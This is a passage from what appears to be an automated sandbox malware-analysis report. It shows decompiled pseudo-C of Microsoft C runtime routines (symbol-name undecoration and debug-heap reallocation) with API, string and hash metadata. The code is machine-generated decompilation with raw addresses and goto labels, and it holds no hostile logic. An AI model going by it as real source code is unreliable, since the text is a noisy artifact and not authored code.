                      				 *0xb30640 = _t51 + 1;
                      				_t92 =  *0xb30640; // 0x0
                      				_v8 =  *_t92;
                      				if(_v8 == 0x41) {
                      					L4:
                      					if(_a16 == 0) {
                      						if( *_a8 == 2 ||  *_a8 == 3) {
                      							 *_a8 = 5;
                      						} else {
                      							if( *_a8 == 1) {
                      								 *_a8 = 4;
                      							}
                      						}
                      					}
                      					_t125 =  *0xb30640; // 0x0
                      					 *0xb30640 = _t125 + 1;
                      					L29:
                      					E0095F3F0(_a4);
                      					return _a4;
                      				}
                      				if(_v8 == 0x42) {
                      					if(_a16 == 0) {
                      						 *_a12 = 1;
                      						E0095F850( &_v20, 0x3e);
                      						_t97 =  *0xb30640; // 0x0
                      						 *0xb30640 = _t97 + 1;
                      						goto L29;
                      					}
                      					E0095F350(_a4, 2);
                      					return _a4;
                      				}
                      				if(_v8 == 0x43) {
                      					 *_a8 = 5;
                      					_t61 =  *0xb30640; // 0x0
                      					 *0xb30640 = _t61 + 1;
                      					goto L29;
                      				}
                      				_t63 =  *0xb30640; // 0x0
                      				if( *_t63 == 0) {
                      					L17:
                      					E0095F350(_a4, 1);
                      					return _a4;
                      				} else {
                      					_t66 =  *0xb30640; // 0x0
                      					if( *((char*)(_t66 + (1 << 0))) != 0) {
                      						if(_a16 == 0) {
                      							_t104 =  *0xb30640; // 0x0
                      							_t105 =  *0xb30640; // 0x0
                      							_t28 =  *((char*)(_t105 + (1 << 0))) - 0x30; // -95
                      							_v12 = ( *_t104 - 0x30 << 4) + _t28;
                      							_t136 =  *0xb30640; // 0x0
                      							 *0xb30640 = _t136 + 2;
                      							if(_v12 > 1) {
                      								E0095F850( &_v20, 0x2c);
                      								E0095F820( &_v20, E0095FB70( &_v20,  &_v36, E0095F510(__ebx,  &_v28, __edi, __esi, _v12, 0)));
                      							}
                      							E0095F820( &_v20, E0095FBB0( &_v20,  &_v44, 0x3e));
                      							_t109 =  *0xb30640; // 0x0
                      							if( *_t109 != 0x24) {
                      								E0095F820( &_v20, E0095FBB0( &_v20,  &_v52, 0x5e));
                      							} else {
                      								_t81 =  *0xb30640; // 0x0
                      								 *0xb30640 = _t81 + 1;
                      							}
                      							_t139 =  *0xb30640; // 0x0
                      							if( *_t139 == 0) {
                      								L0095FF10( &_v20, 1);
                      							} else {
                      								_t116 =  *0xb30640; // 0x0
                      								 *0xb30640 = _t116 + 1;
                      							}
                      							E0096AAA0( &_v20);
                      							E0095F240(_a4,  &_v20);
                      							return _a4;
                      						}
                      						E0095F350(_a4, 2);
                      						return _a4;
                      					}
                      					goto L17;
                      				}
                      				goto L4;
                      			}

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00965069
                      • DName::DName.LIBVCRUNTIMED ref: 009650F2
                      • DName::DName.LIBVCRUNTIMED ref: 0096516D
                      • DName::DName.LIBVCRUNTIMED ref: 00965185
                      • DName::DName.LIBVCRUNTIMED ref: 009651EC
                        • Part of subcall function 0095F510: __aullrem.LIBCMT ref: 0095F557
                        • Part of subcall function 0095F510: __aulldiv.LIBCMT ref: 0095F570
                      • DName::operator+.LIBCMTD ref: 009651F9
                        • Part of subcall function 0095FB70: Mailbox.LIBCMTD ref: 0095FB80
                        • Part of subcall function 0095FB70: Mailbox.LIBCMTD ref: 0095FB98
                      • Mailbox.LIBCMTD ref: 00965202
                      • DName::operator+.LIBCMTD ref: 00965210
                      • Mailbox.LIBCMTD ref: 00965219
                      • DName::operator+.LIBCMTD ref: 00965244
                        • Part of subcall function 0095FBB0: Mailbox.LIBCMTD ref: 0095FBC0
                        • Part of subcall function 0095FBB0: DName::operator+=.LIBCMTD ref: 0095FBCD
                        • Part of subcall function 0095FBB0: Mailbox.LIBCMTD ref: 0095FBD9
                      • Mailbox.LIBCMTD ref: 0096524D
                      • DName::operator+=.LIBCMTD ref: 00965275
                        • Part of subcall function 0095FF10: DName::isValid.LIBCMTD ref: 0095FF1A
                        • Part of subcall function 0095FF10: DName::isEmpty.LIBCMTD ref: 0095FF26
                        • Part of subcall function 0095FF10: DName::operator=.LIBVCRUNTIMED ref: 0095FF42
                      • DName::setIsComArray.LIBCMTD ref: 0096527D
                      • Mailbox.LIBCMTD ref: 00965289
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00965296
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Mailbox$NameName::$Name::operator+$Iterator_baseIterator_base::_Name::isName::operator+=std::_$ArrayEmptyName::operator=Name::setValid__aulldiv__aullrem
                      • String ID: C
                      • API String ID: 961569035-1037565863
                      • Opcode ID: 2b6e72b16a2d2ef91182e9358b7c343d45c9cb2ea8589bc7641ad56a2abeca6a
                      • Instruction ID: ee761736141c16bf313d9877f15f9e97301990b64930869c3b3ecfd6f3319728
                      • Opcode Fuzzy Hash: 2b6e72b16a2d2ef91182e9358b7c343d45c9cb2ea8589bc7641ad56a2abeca6a
                      • Instruction Fuzzy Hash: 8561BE70914915DFEB18EF14CCB2BBE7775FF81305F244069E81A5B2A9CB75AA44CB80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E009625F0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                      				char _v8;
                      				char _v12;
                      				char* _v16;
                      				char* _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				char _v36;
                      				intOrPtr _v40;
                      				char _v44;
                      				intOrPtr _v48;
                      				char _v52;
                      				intOrPtr _v56;
                      				char _v60;
                      				intOrPtr _v64;
                      				char _v68;
                      				intOrPtr _v72;
                      				char _v76;
                      				intOrPtr* _t53;
                      				void* _t57;
                      				void* _t75;
                      				intOrPtr _t86;
                      				intOrPtr* _t93;
                      				intOrPtr _t95;
                      				intOrPtr _t98;
                      				intOrPtr _t103;
                      				intOrPtr _t105;
                      				intOrPtr _t106;
                      				char _t108;
                      
                      				_t53 =  *0xb30640; // 0x0
                      				_t85 =  *_t53;
                      				_v12 =  *_t53;
                      				if(_v12 == 0x58) {
                      					_t86 =  *0xb30640; // 0x0
                      					 *0xb30640 = _t86 + 1;
                      					_v60 = E00960060("void", 4);
                      					_v56 = _t103;
                      					E0095F1F0(_a4,  &_v60);
                      					return _a4;
                      				}
                      				_t122 = _v12 - 0x5a;
                      				if(_v12 == 0x5a) {
                      					L3:
                      					_t105 =  *0xb30640; // 0x0
                      					_t106 = _t105 + 1;
                      					 *0xb30640 = _t106;
                      					_t57 = E009621D0(_t85);
                      					__eflags = _t57;
                      					if(_t57 == 0) {
                      						_v52 = E00960060("<ellipsis>", 0xa);
                      						_v48 = _t106;
                      						_v16 =  &_v52;
                      					} else {
                      						_v44 = E00960060("...", 3);
                      						_v40 = _t106;
                      						_v16 =  &_v44;
                      					}
                      					_v24 = _v16;
                      					E0095F1F0(_a4, _v24);
                      					return _a4;
                      				}
                      				E009624A0(__ebx, __edi, __esi, _t122,  &_v36);
                      				if(E0096AB70( &_v36) != 0) {
                      					E0095F240(_a4,  &_v36);
                      					return _a4;
                      				} else {
                      					_t93 =  *0xb30640; // 0x0
                      					_t108 =  *_t93;
                      					_v8 = _t108;
                      					if(_v8 == 0) {
                      						E0095F240(_a4,  &_v36);
                      						return _a4;
                      					}
                      					if(_v8 == 0x40) {
                      						_t95 =  *0xb30640; // 0x0
                      						 *0xb30640 = _t95 + 1;
                      						E0095F240(_a4,  &_v36);
                      						return _a4;
                      					}
                      					if(_v8 == 0x5a) {
                      						_t98 =  *0xb30640; // 0x0
                      						 *0xb30640 = _t98 + 1;
                      						_t75 = E009621D0(_t98 + 1);
                      						__eflags = _t75;
                      						if(_t75 == 0) {
                      							_v76 = E00960060(",<ellipsis>", 0xb);
                      							_v72 = _t108;
                      							_v20 =  &_v76;
                      						} else {
                      							_v68 = E00960060(",...", 4);
                      							_v64 = _t108;
                      							_v20 =  &_v68;
                      						}
                      						_v28 = _v20;
                      						E0095FB30( &_v36, _a4, _v28);
                      						return _a4;
                      					}
                      					E0095F350(_a4, 2);
                      					return _a4;
                      				}
                      				goto L3;
                      			}

                      APIs
                      • UnDecorator::doEllipsis.LIBCMTD ref: 00962620
                      • UnDecorator::getArgumentList.LIBCMTD ref: 009626B7
                        • Part of subcall function 009624A0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 009624B0
                        • Part of subcall function 009624A0: DName::operator+=.LIBCMTD ref: 009624FC
                        • Part of subcall function 009624A0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00962561
                        • Part of subcall function 009624A0: Replicator::isFull.LIBCMTD ref: 00962587
                        • Part of subcall function 009624A0: Replicator::operator+=.LIBCMTD ref: 0096259A
                        • Part of subcall function 009624A0: DName::operator=.LIBVCRUNTIMED ref: 009625BB
                        • Part of subcall function 009624A0: DName::operator+=.LIBCMTD ref: 009625C7
                        • Part of subcall function 009624A0: Mailbox.LIBCMTD ref: 009625DA
                      • Mailbox.LIBCMTD ref: 009626FC
                      • UnDecorator::doEllipsis.LIBCMTD ref: 00962718
                      • DName::operator+.LIBCMTD ref: 0096276A
                      • Mailbox.LIBCMTD ref: 0096278A
                      • DName::DName.LIBVCRUNTIMED ref: 00962799
                        • Part of subcall function 0095F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F3AE
                      • Mailbox.LIBCMTD ref: 009627AC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Mailbox$Decorator::doEllipsisIterator_baseIterator_base::_NameName::operator+=std::_$ArgumentDecorator::getFullListName::Name::operator+Name::operator=Node::makeReplicator::isReplicator::operator+=Status
                      • String ID: ,...$,<ellipsis>$...$<ellipsis>$Z$Z$void
                      • API String ID: 3869916097-1416550716
                      • Opcode ID: 4a80f005b4ce431ac35712c0dd8e4b7288c2ca10b2b43c9e5d06108be0fb97d4
                      • Instruction ID: 7c5026c35cbc3a465c120679e774ef0faba55c89992a012a91fd15890271f5f3
                      • Opcode Fuzzy Hash: 4a80f005b4ce431ac35712c0dd8e4b7288c2ca10b2b43c9e5d06108be0fb97d4
                      • Instruction Fuzzy Hash: D55164B4D44608EFDB04EF94DCA1BED7BB4BF84304F14806AE90967351D7746A44DB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 83%
                      			E00997560(void* __edi, intOrPtr _a4, signed int* _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
                      				signed int _v5;
                      				void* _v6;
                      				signed int* _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				intOrPtr _v32;
                      				signed int _v36;
                      				signed int _t131;
                      				signed char _t132;
                      				signed int _t135;
                      				intOrPtr _t136;
                      				intOrPtr _t137;
                      				signed int* _t141;
                      				intOrPtr _t142;
                      				intOrPtr _t145;
                      				signed int* _t153;
                      				signed int _t157;
                      				void* _t158;
                      				void* _t160;
                      				void* _t162;
                      				intOrPtr _t169;
                      				signed int _t171;
                      				signed int* _t176;
                      				void* _t180;
                      				void* _t184;
                      				void* _t185;
                      				void* _t186;
                      				void* _t191;
                      				void* _t192;
                      				signed int _t195;
                      				signed int _t197;
                      				void* _t198;
                      				void* _t200;
                      				signed int _t209;
                      				signed int _t213;
                      				signed int _t221;
                      				intOrPtr _t232;
                      				intOrPtr _t234;
                      				signed int* _t253;
                      				signed int _t257;
                      				signed int _t259;
                      				intOrPtr _t272;
                      				signed int _t275;
                      				signed int _t276;
                      				void* _t288;
                      				void* _t289;
                      				void* _t290;
                      				void* _t291;
                      				void* _t292;
                      				void* _t293;
                      				void* _t294;
                      				void* _t295;
                      
                      				_t288 = __edi;
                      				if(_a4 == 0) {
                      					return E00999580( *_a8, _a12, _a16, _a20);
                      				}
                      				__eflags = _a24 & 0x000000ff;
                      				if((_a24 & 0x000000ff) == 0) {
                      					L5:
                      					L00997AE0();
                      					_t131 =  *0xa06058; // 0x34
                      					_v24 = _t131;
                      					__eflags =  *0xa06060 - 0xffffffff;
                      					if( *0xa06060 != 0xffffffff) {
                      						__eflags = _v24 -  *0xa06060; // 0xffffffff
                      						if(__eflags == 0) {
                      							asm("int3");
                      						}
                      					}
                      					__eflags =  *0xa06244;
                      					if( *0xa06244 == 0) {
                      						L17:
                      						__eflags = _a12 - 1;
                      						if(_a12 == 1) {
                      							L27:
                      							_t132 = E00997360(_t207, _a4);
                      							_t290 = _t289 + 4;
                      							__eflags = _t132 & 0x000000ff;
                      							if(__eflags == 0) {
                      								L31:
                      								_t135 = L009980B0(_a4);
                      								_t291 = _t290 + 4;
                      								__eflags = _t135;
                      								if(__eflags == 0) {
                      									_t185 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\debug_heap.cpp", 0x25c, 0, L"%ls", L"_CrtIsValidHeapPointer(block)");
                      									_t291 = _t291 + 0x18;
                      									__eflags = _t185 - 1;
                      									if(_t185 == 1) {
                      										asm("int3");
                      									}
                      								}
                      								_t136 = E00996E40(_a4);
                      								_t292 = _t291 + 4;
                      								_v16 = _t136;
                      								_t137 = _v16;
                      								__eflags =  *((intOrPtr*)(_t137 + 0x10)) - 3;
                      								if( *((intOrPtr*)(_t137 + 0x10)) != 3) {
                      									_v6 = 0;
                      								} else {
                      									_v6 = 1;
                      								}
                      								_v5 = _v6;
                      								__eflags = _v5 & 0x000000ff;
                      								if((_v5 & 0x000000ff) == 0) {
                      									_t209 =  *0xb306ec; // 0x334e
                      									__eflags = _t209 -  *((intOrPtr*)(_v16 + 0x14));
                      									if(__eflags >= 0) {
                      										goto L47;
                      									}
                      									_t180 = L009948E0(__eflags, 1, 0, 0, 0, "Error: possible heap corruption at or near 0x%p", _a4);
                      									__eflags = _t180 - 1;
                      									if(_t180 == 1) {
                      										asm("int3");
                      									}
                      									 *((intOrPtr*)(L00992F70(_t209))) = 0x16;
                      									return 0;
                      								} else {
                      									__eflags =  *((intOrPtr*)(_v16 + 0xc)) - 0xfedcbabc;
                      									if(__eflags != 0) {
                      										L40:
                      										_t184 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\debug_heap.cpp", 0x263, 0, L"%ls", L"old_head->_line_number == line_number_for_ignore_blocks && old_head->_request_number == request_number_for_ignore_blocks");
                      										_t292 = _t292 + 0x18;
                      										__eflags = _t184 - 1;
                      										if(_t184 == 1) {
                      											asm("int3");
                      										}
                      										L42:
                      										L47:
                      										_t210 = _a8;
                      										__eflags =  *_a8 - 0xffffffbc;
                      										if( *_a8 <= 0xffffffbc) {
                      											_v32 =  *_a8 + 0x24;
                      											_v12 = 0;
                      											_t211 = _a24 & 0x000000ff;
                      											__eflags = _a24 & 0x000000ff;
                      											if((_a24 & 0x000000ff) == 0) {
                      												_t141 = E009ACA20(_v32, _v16, _v32);
                      												_t293 = _t292 + 8;
                      												_v12 = _t141;
                      												__eflags = _v12;
                      												if(_v12 != 0) {
                      													L55:
                      													_t142 =  *0xa06058; // 0x34
                      													 *0xa06058 = _t142 + 1;
                      													_t213 = _v5 & 0x000000ff;
                      													__eflags = _t213;
                      													if(_t213 == 0) {
                      														__eflags =  *0xb306ec - 0xffffffff;
                      														if( *0xb306ec < 0xffffffff) {
                      															_t171 =  *0xb306ec; // 0x334e
                      															 *0xb306ec = _t171 - _v12[5];
                      															__eflags = (_t213 | 0xffffffff) -  *0xb306ec -  *_a8;
                      															if((_t213 | 0xffffffff) -  *0xb306ec <=  *_a8) {
                      																_v36 = 0xffffffff;
                      															} else {
                      																_v36 =  *_a8;
                      															}
                      															_t275 =  *0xb306ec; // 0x334e
                      															_t276 = _t275 + _v36;
                      															__eflags = _t276;
                      															 *0xb306ec = _t276;
                      														}
                      														_t232 =  *0xb306f0; // 0x2309
                      														 *0xb306f0 = _t232 - _v12[5];
                      														_t169 =  *0xb306f0; // 0x2309
                      														 *0xb306f0 = _t169 +  *_a8;
                      														_t234 =  *0xb306f0; // 0x2309
                      														__eflags = _t234 -  *0xb306f4; // 0x2309
                      														if(__eflags > 0) {
                      															_t272 =  *0xb306f0; // 0x2309
                      															 *0xb306f4 = _t272;
                      														}
                      													}
                      													_t145 = E00996370(_v12);
                      													_t294 = _t293 + 4;
                      													_v20 = _t145;
                      													_t253 = _v12;
                      													__eflags =  *_a8 -  *((intOrPtr*)(_t253 + 0x14));
                      													if( *_a8 >  *((intOrPtr*)(_t253 + 0x14))) {
                      														__eflags = _v20 + _v12[5];
                      														E0095AF80(_t288, _v20 + _v12[5], 0xcd,  *_a8 - _v12[5]);
                      														_t294 = _t294 + 0xc;
                      													}
                      													E0095AF80(_t288, _v20 +  *_a8, 0xfd, 4);
                      													_t295 = _t294 + 0xc;
                      													__eflags = _v5 & 0x000000ff;
                      													if((_v5 & 0x000000ff) == 0) {
                      														_v12[2] = _a16;
                      														_v12[3] = _a20;
                      														_v12[6] = _v24;
                      													}
                      													_v12[5] =  *_a8;
                      													__eflags = _a24 & 0x000000ff;
                      													if((_a24 & 0x000000ff) != 0) {
                      														L72:
                      														__eflags = _v12 - _v16;
                      														if(_v12 == _v16) {
                      															L74:
                      															return _v20;
                      														}
                      														__eflags = _v5 & 0x000000ff;
                      														if((_v5 & 0x000000ff) == 0) {
                      															__eflags =  *_v12;
                      															if( *_v12 == 0) {
                      																_t257 =  *0xb306e8; // 0xe7f2d8
                      																__eflags = _t257 - _v16;
                      																if(__eflags != 0) {
                      																	_t160 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\debug_heap.cpp", 0x2c5, 0, L"%ls", L"__acrt_last_block == old_head");
                      																	_t295 = _t295 + 0x18;
                      																	__eflags = _t160 - 1;
                      																	if(_t160 == 1) {
                      																		asm("int3");
                      																	}
                      																}
                      																 *0xb306e8 = _v12[1];
                      															} else {
                      																 *( *_v12 + 4) = _v12[1];
                      															}
                      															_t153 = _v12;
                      															__eflags =  *(_t153 + 4);
                      															if( *(_t153 + 4) == 0) {
                      																_t259 =  *0xb306e4; // 0xe83700
                      																__eflags = _t259 - _v16;
                      																if(__eflags != 0) {
                      																	_t158 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\debug_heap.cpp", 0x2cf, 0, L"%ls", L"__acrt_first_block == old_head");
                      																	__eflags = _t158 - 1;
                      																	if(_t158 == 1) {
                      																		asm("int3");
                      																	}
                      																}
                      																 *0xb306e4 =  *_v12;
                      															} else {
                      																 *(_v12[1]) =  *_v12;
                      															}
                      															__eflags =  *0xb306e4;
                      															if( *0xb306e4 == 0) {
                      																 *0xb306e8 = _v12;
                      															} else {
                      																_t157 =  *0xb306e4; // 0xe83700
                      																 *((intOrPtr*)(_t157 + 4)) = _v12;
                      															}
                      															_t221 =  *0xb306e4; // 0xe83700
                      															 *_v12 = _t221;
                      															_v12[1] = 0;
                      															 *0xb306e4 = _v12;
                      															return _v20;
                      														}
                      														goto L74;
                      													} else {
                      														__eflags = _a24 & 0x000000ff;
                      														if(__eflags != 0) {
                      															L70:
                      															_t162 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\debug_heap.cpp", 0x2b8, 0, L"%ls", L"reallocation_is_allowed || (!reallocation_is_allowed && new_head == old_head)");
                      															_t295 = _t295 + 0x18;
                      															__eflags = _t162 - 1;
                      															if(_t162 == 1) {
                      																asm("int3");
                      															}
                      															goto L72;
                      														}
                      														__eflags = _v12 - _v16;
                      														if(__eflags == 0) {
                      															goto L72;
                      														}
                      														goto L70;
                      													}
                      												}
                      												return 0;
                      											}
                      											_t176 = E009A9820(_t211, _v16, _v32);
                      											_t293 = _t292 + 8;
                      											_v12 = _t176;
                      											__eflags = _v12;
                      											if(_v12 != 0) {
                      												goto L55;
                      											}
                      											return 0;
                      										}
                      										 *((intOrPtr*)(L00992F70(_t210))) = 0xc;
                      										return 0;
                      									}
                      									__eflags =  *(_v16 + 0x18);
                      									if(__eflags == 0) {
                      										goto L42;
                      									}
                      									goto L40;
                      								}
                      							}
                      							_t239 = _a4;
                      							_t186 = L009948E0(__eflags, 1, 0, 0, 0, "The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()", _a4);
                      							__eflags = _t186 - 1;
                      							if(_t186 == 1) {
                      								asm("int3");
                      							}
                      							 *((intOrPtr*)(L00992F70(_t239))) = 0x16;
                      							return 0;
                      						}
                      						__eflags = (_a12 & 0x0000ffff) - 4;
                      						if((_a12 & 0x0000ffff) == 4) {
                      							goto L27;
                      						}
                      						__eflags = (_a12 & 0x0000ffff) - 2;
                      						if((_a12 & 0x0000ffff) == 2) {
                      							goto L27;
                      						}
                      						__eflags = _a16;
                      						if(__eflags == 0) {
                      							_t191 = L009948E0(__eflags, 1, 0, 0, 0, "%s", "Error: memory allocation: bad memory block type.\n");
                      							_t290 = _t289 + 0x18;
                      							__eflags = _t191 - 1;
                      							if(_t191 == 1) {
                      								asm("int3");
                      							}
                      						} else {
                      							_push(_a20);
                      							_t192 = L009948E0(__eflags, 1, 0, 0, 0, "Error: memory allocation: bad memory block type.\n\nMemory allocated at %hs(%d).\n", _a16);
                      							_t290 = _t289 + 0x1c;
                      							__eflags = _t192 - 1;
                      							if(_t192 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						goto L31;
                      					}
                      					_t195 =  *0xa06244; // 0x9acb50
                      					_v28 = _t195;
                      					_t207 = _v28;
                      					 *0x9d62b0(2, _a4,  *_a8, _a12, _v24, _a16, _a20);
                      					_t197 = _v28();
                      					_t289 = _t289 + 0x1c;
                      					__eflags = _t197;
                      					if(_t197 != 0) {
                      						goto L17;
                      					}
                      					__eflags = _a16;
                      					if(__eflags == 0) {
                      						_t198 = L009948E0(__eflags, 0, 0, 0, 0, "%s", "Client hook re-allocation failure.\n");
                      						__eflags = _t198 - 1;
                      						if(_t198 == 1) {
                      							asm("int3");
                      						}
                      						L16:
                      						return 0;
                      					}
                      					_push(_a20);
                      					_t200 = L009948E0(__eflags, 0, 0, 0, 0, "Client hook re-allocation failure at file %hs line %d.\n", _a16);
                      					__eflags = _t200 - 1;
                      					if(_t200 == 1) {
                      						asm("int3");
                      					}
                      					goto L16;
                      				} else {
                      					__eflags =  *_a8;
                      					if(__eflags != 0) {
                      						goto L5;
                      					} else {
                      						L00999480(__eflags, _a4, _a12);
                      						return 0;
                      					}
                      				}
                      			}
                      0x00997709
                      0x0099770b
                      0x0099770b
                      0x00997711
                      0x00000000
                      0x00997717
                      0x0099767b
                      0x0099767e
                      0x00000000
                      0x00000000
                      0x00997688
                      0x0099768b
                      0x00000000
                      0x00000000
                      0x0099768d
                      0x00997691
                      0x009976ca
                      0x009976cf
                      0x009976d2
                      0x009976d5
                      0x009976d7
                      0x009976d7
                      0x00997693
                      0x00997696
                      0x009976a8
                      0x009976ad
                      0x009976b0
                      0x009976b3
                      0x009976b5
                      0x009976b5
                      0x009976b6
                      0x00000000
                      0x009976d8
                      0x009975ff
                      0x00997604
                      0x00997607
                      0x0099760a
                      0x00997610
                      0x00997613
                      0x00997616
                      0x00997618
                      0x00000000
                      0x00000000
                      0x0099761a
                      0x0099761e
                      0x00997657
                      0x0099765f
                      0x00997662
                      0x00997664
                      0x00997664
                      0x00997665
                      0x00000000
                      0x00997665
                      0x00997623
                      0x00997635
                      0x0099763d
                      0x00997640
                      0x00997642
                      0x00997642
                      0x00000000
                      0x00997595
                      0x00997598
                      0x0099759b
                      0x00000000
                      0x0099759d
                      0x009975a5
                      0x00000000
                      0x009975ad
                      0x0099759b

                      APIs
                      Strings
                      • Error: possible heap corruption at or near 0x%p, xrefs: 009977D3
                      • %ls, xrefs: 00997733, 0099779E, 009979B5, 00997A16, 00997A6B
                      • __acrt_last_block == old_head, xrefs: 00997A11
                      • reallocation_is_allowed || (!reallocation_is_allowed && new_head == old_head), xrefs: 009979B0
                      • old_head->_line_number == line_number_for_ignore_blocks && old_head->_request_number == request_number_for_ignore_blocks, xrefs: 00997799
                      • Error: memory allocation: bad memory block type., xrefs: 009976B8
                      • _CrtIsValidHeapPointer(block), xrefs: 0099772E
                      • Error: memory allocation: bad memory block type.Memory allocated at %hs(%d)., xrefs: 0099769B
                      • Client hook re-allocation failure., xrefs: 00997645
                      • minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp, xrefs: 0099773F, 009977AA, 009979C1, 00997A22, 00997A77
                      • __acrt_first_block == old_head, xrefs: 00997A66
                      • The Block at 0x%p was allocated by aligned routines, use _aligned_realloc(), xrefs: 009976F1
                      • Client hook re-allocation failure at file %hs line %d., xrefs: 00997628
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: __wcstombs_l
                      • String ID: %ls$Client hook re-allocation failure at file %hs line %d.$Client hook re-allocation failure.$Error: memory allocation: bad memory block type.$Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).$Error: possible heap corruption at or near 0x%p$The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()$_CrtIsValidHeapPointer(block)$__acrt_first_block == old_head$__acrt_last_block == old_head$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$old_head->_line_number == line_number_for_ignore_blocks && old_head->_request_number == request_number_for_ignore_blocks$reallocation_is_allowed || (!reallocation_is_allowed && new_head == old_head)
                      • API String ID: 3007373345-458177602
                      • Opcode ID: fed17884296d1d8e48121dab35792b1a79797c48c3f7c0805d3a8020500ad779
                      • Instruction ID: 14fac237d3a29ddef909c382444d5f1081d1711e5db3d32415cf6936d8d43b4a
                      • Opcode Fuzzy Hash: fed17884296d1d8e48121dab35792b1a79797c48c3f7c0805d3a8020500ad779
                      • Instruction Fuzzy Hash: 3602CD74A24209EFDF14DF98C882FAEB7B5BF94708F208548E8149B381DB70E941CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00968210(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                      				signed int _v5;
                      				signed int _v6;
                      				signed char _v7;
                      				signed char _v8;
                      				char _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				char _v28;
                      				char _v36;
                      				intOrPtr _v40;
                      				char _v44;
                      				char _v52;
                      				char _v60;
                      				char _v68;
                      				char* _t60;
                      				char* _t66;
                      				void* _t67;
                      				char _t75;
                      				intOrPtr _t81;
                      				void* _t83;
                      				intOrPtr _t85;
                      				void* _t90;
                      				intOrPtr _t97;
                      				intOrPtr _t109;
                      				intOrPtr _t110;
                      				intOrPtr _t113;
                      				intOrPtr _t116;
                      				intOrPtr _t118;
                      				char* _t121;
                      				char* _t122;
                      				char* _t123;
                      				intOrPtr _t124;
                      				char* _t126;
                      				intOrPtr _t129;
                      				void* _t138;
                      				void* _t139;
                      				void* _t140;
                      
                      				_t139 = __esi;
                      				_t138 = __edi;
                      				_t90 = __ebx;
                      				_v6 = 1;
